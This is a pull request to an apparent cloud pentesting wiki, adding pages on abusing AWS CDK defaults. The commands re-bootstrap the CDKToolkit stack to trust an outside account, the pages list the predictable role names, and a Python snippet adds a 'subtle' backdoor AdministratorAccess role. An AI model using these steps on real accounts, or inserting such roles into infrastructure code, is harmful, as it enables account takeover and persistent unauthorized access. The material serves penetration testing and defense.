### PR TITLE
arte-TheToddLuci0

### DIFF
--- a/src/SUMMARY.md
+++ b/src/SUMMARY.md
@@ -211,6 +211,7 @@
   - [AWS - Permissions for a Pentest](pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md)
   - [AWS - Persistence](pentesting-cloud/aws-security/aws-persistence/README.md)
     - [AWS - API Gateway Persistence](pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md)
+    - [AWS - Cloudformation Persistence](pentesting-cloud/aws-security/aws-persistence/aws-cloudformation-persistence.md)
     - [AWS - Cognito Persistence](pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md)
     - [AWS - DynamoDB Persistence](pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md)
     - [AWS - EC2 Persistence](pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md)

--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-cloudformation-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-cloudformation-persistence.md
@@ -1,0 +1,25 @@
+# AWS - Cloudformation Persistence
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## CloudFormation
+
+For more information, access:
+
+{{#ref}}
+../aws-services/aws-cloudformation-and-codestar-enum.md
+{{#endref}}
+
+### CDK Bootstrap Stack
+
+The AWS CDK deploys a CFN stack called `CDKToolkit`. This stack supports a parameter `TrustedAccounts` which allow external accounts to deploy CDK projects into the victim account. An attacker can abuse this to grant themselves indefinite access to the victim account, either by using the AWS cli to redeploy the stack with parameters, or the AWS CDK cli.
+
+```bash
+# CDK
+cdk bootstrap --trust 1234567890
+
+# AWS CLI
+aws cloudformation update-stack --use-previous-template --parameters ParameterKey=TrustedAccounts,ParameterValue=1234567890
+```
+
+{{#include ../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/README.md
@@ -111,9 +111,58 @@ An attacker could abuse this permission without the passRole permission to updat
 
 **Potential Impact:** Privesc to the attached cloudformation roles.
 
+## AWS CDK
+
+The AWS cdk is a toolkit for allowing users to define their infrastructure-as-code in languages they are already familiar with, as well as easily re-using sections. The CDK then converts the high-level code (ie python) into Cloudformation templates (yaml or json).
+
+In order to use the CDK, an administrative user must first bootstrap the account, which create several IAM roles, including the *exec role*, which has \*/\* permissions. These roles follow the naming structure `cdk-<qualifier>-<name>-<account-id>-<region>`. Bootstrapping must be done once per region per account.
+
+By default, CDK users do not have access to list the roles needed to use the CDK, meaning that you will need to determine them manually. If you compromise a developers machine or some CI/CD node, these roles can can be assumed to grant yourself the ability to deploy CFN templates, using the `cfn-exec` role to allow CFN to deploy any resources, fully compromising the account.
+
+### Determining the role names
+
+If you have `cloudformation:DescribeStacks`, the roles are defined in a stack called `CDKToolkit`, and you can pull the names from there.
+
+If you're on a machine that has been used to build and deploy CDK projects, you can pull them from `cdk.out/manafest.json` in the projects root directory.
+
+You can also make a good guess on what they are. `qualifier` is a string added to the roles allowing for multiple instance of the CDK bootstrap to be deployed at once, however the default value is hard-coded to `hnb659fds`. 
+
+```
+# Defaults
+cdk-hnb659fds-cfn-exec-role-<account-id>-<region>
+cdk-hnb659fds-deploy-role-<account-id>-<region>
+cdk-hnb659fds-file-publishing-role-<account-id>-<region>
+cdk-hnb659fds-image-publishing-role-<account-id>-<region>
+cdk-hnb659fds-lookup-role-<account-id>-<region>
+```
+
+### Adding malicious code to the project source
+
+If you can write to the project source, but cannot deploy it yourself (for example, the developer deploys the code via CI/CD, not the local machine), you can still compromise the environment by adding malicious resources to the stack. The following adds an IAM role that can be assumed by an attacker account to a python CDK project.
+
+```python
+class CdkTestStack(Stack):
+    def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:
+        super().__init__(scope, construct_id, **kwargs)
+
+        # ----------
+        # Some existing code.....
+        # ----------
+
+        role = iam.Role(
+            self,
+            "cdk-backup-role", # Role name, make it something subtle
+            assumed_by=iam.AccountPrincipal("1234567890"), # Account to allow to assume the role
+            managed_policies=[
+                iam.ManagedPolicy.from_aws_managed_policy_name("AdministratorAccess") # Policies to attach, in this case AdministratorAccess
+            ],
+        )
+```
+
 ## References
 
 - [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/)
+- [https://github.com/aws/aws-cdk-cli/blob/main/packages/aws-cdk/lib/api/bootstrap/bootstrap-template.yaml](https://github.com/aws/aws-cdk-cli/blob/main/packages/aws-cdk/lib/api/bootstrap/bootstrap-template.yaml)
 
 {{#include ../../../../banners/hacktricks-training.md}}
 

--- a/src/pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md
@@ -39,6 +39,12 @@ In the following page you can check how to **abuse cloudformation permissions to
 ../aws-privilege-escalation/aws-cloudformation-privesc/
 {{#endref}}
 
+### Persistence
+
+{{#ref}}
+../aws-persistence/aws-cloudformation-persistence.md
+{{#endref}}
+
 ### Post-Exploitation
 
 Check for **secrets** or sensitive information in the **template, parameters & output** of each CloudFormation


### PR DESCRIPTION
Add some info on using the default configuration of the AWS CDK to compromise an account. The privesc section explains how to abuse the default configuration to assume roles with predictable names to deploy arbitrary CFN templates, as well as an example of how to compromise an account by editing an IAC config. The persistence section (new page) describes how the default bootstrap stack can be modified to enable an attacker to maintain access.

I put it in the `cloudformation` section, since it uses that behind the scenes, however if it should be in it's own section I have no issues moving it. 



